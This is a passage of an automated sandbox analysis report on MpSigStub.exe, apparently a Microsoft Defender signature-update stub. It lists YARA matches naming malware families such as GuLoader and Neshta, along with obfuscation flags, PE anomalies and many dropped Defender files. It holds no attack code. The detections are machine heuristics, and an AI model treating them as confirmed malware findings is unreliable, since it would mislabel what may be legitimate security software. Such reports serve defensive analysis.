Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MaliciousMacro
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Costura Assembly Loader
Source: Yara match File source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336234827.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BatToExe compiled binary
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.45.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.45.dr Static PE information: section name: .didat
Source: NisSrv.exe.45.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.45.dr Static PE information: section name: .didat
Source: MpClient.dll.45.dr Static PE information: section name: .didat
Source: MpCommu.dll.45.dr Static PE information: section name: .didat
Source: MpRtp.dll.45.dr Static PE information: section name: .didat
Source: MpSvc.dll.45.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.45.dr Static PE information: section name: .didat
Source: MpClient.dll0.45.dr Static PE information: section name: .didat
PE file contains an invalid checksum
Source: mpavbase.vdm.36.dr Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.36.dr Static PE information: real checksum: 0x329e303 should be:

Persistence and Installation Behavior:

Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gl-ES\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
